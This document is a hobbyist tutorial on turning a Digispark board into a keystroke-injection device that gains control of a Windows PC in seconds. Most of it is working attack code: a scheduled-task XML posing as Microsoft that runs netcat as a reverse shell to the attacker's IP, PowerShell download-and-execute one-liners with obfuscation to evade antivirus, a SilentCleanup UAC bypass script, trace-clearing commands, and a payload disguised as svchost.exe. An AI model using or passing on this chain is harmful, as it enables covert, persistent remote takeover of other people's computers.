Gain control on a computer in 3 seconds

Gain control on a computer in 3 seconds

As seen on Mr.Robot (S04x10)

Mr Robot hodling Digispark

So, I made a rubber ducky with a small arduino board called digispark. The original rubber duckies are pretty costly (for me anyway) link here. Sure they're fast and have more memory than digisparks, but making one our own will give us complete control of the board.We can configure the boot load times, make signals with on-board led etc.

UAC bypass

UAC means 'User Account Control'. Yes, even if your computer has tight securities like when you try to install an app, the UAC dialogue box appears asking a simple 'Yes' or 'No'. We're going to bypass and go further.

UAC prompt screen

We'll also evade all major anti-virus applications using clever tricks.

So how do we do this

Well, first of all you need to download netcat 1.12 here and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, it works like a charm and link doesn't expire. Just upload the file to discord, right click on it and select copy media link.

Second, you need to make yourself an .XML file which you'll need later for Task Scheduler. I believe scheduled tasks are really good way to set up persistence. It means our hack will always run in background even when the system restarts or anything. Scheduled tasks are also good for escalating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy.

I already did the work for you. This is what it should look like.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="">
<Author>Microsoft Corporation</Author>
<Description>This will ensure system stability in case of an unexpected update interruption.</Description>
<Principal id="Author">
  <Actions Context="Author">
  <Arguments>(Your IP address without brackets) 4444 -e cmd.exe -d</Arguments>

Just modify the arguments in the bottom with your IP/PORT. You can google how to find ip-address of your device.Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file.

Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell:

cd $env:public
(new-object net.webclient).downloadfile($url1,$path1)
(new-object net.webclient).downloadfile($url2,$path2)
cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml'

Whats happening?

We're creating a persistent reverse shell(more about reverse shell here).

First, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses the UAC bypass technique i shared at the end of this post to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges(high level privileges or access) in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created.

Now you're probably thinking, this is all nice, but how the hell do we run this in one-line of code?

Very simple, by invoking expression called DownloadString in powershell like this:

powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN_LINK')"

But problem with this one-liner is, that it gets picked up by most Anti-viruses as "malicious activity". Therefore, we need to obfuscate(hide) it a bit:

cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))"

And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.

The UAC bypass technique

Bypassing highest UAC level [Windows 8,10,11]

It's done by adding temporary Environment variable windir into HKCU\Environment registry path.

There's an auto-elevated task called SilentCleanup and it's located in: %windir%\system32\cleanmgr.exe We can easily abuse this and elevate any file with Administrator privileges without prompting UAC (even highest level).

So let's say I'm gonna set windir to: "cmd /k REM "

And forcefully run SilentCleanup task:

schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.

If you want to try this for yourself, here's a little batch script I made to elevate powershell:

@echo off
mode 18,1
color FE
reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
timeout /t 2 >nul
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
timeout /t 3 >nul
reg delete "HKCU\Environment" /v "windir" /F

Wait i hacked my own system

You may be testing this on your own system. If you want to remove the reverse shell, copy the following code into a batch file( files ending with .bat extension on windows) and run it with administrator privilages.(right click on the bat file and click run-as-administrator).

@echo off
schtasks /end /tn "Windows Update Assistant" >nul
schtasks /delete /tn "Windows Update Assistant" /f
cd %public%
attrib -s -h svchost.exe
del /q svchost.exe
timeout /t 1 >nul

Rubber ducky code

Digispark works with Arduino IDE, you can learn writing Arduino scripts on google. It's pretty simple and easy. You can learn how to setup Arduino IDE for digispark here

#include "DigiKeyboard.h"

void setup() {}

void loop() {
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT,KEY_R);

Above code is simple and Works on any PC. Plug-in your digispark to PC and see the magic happen in 3 seconds.

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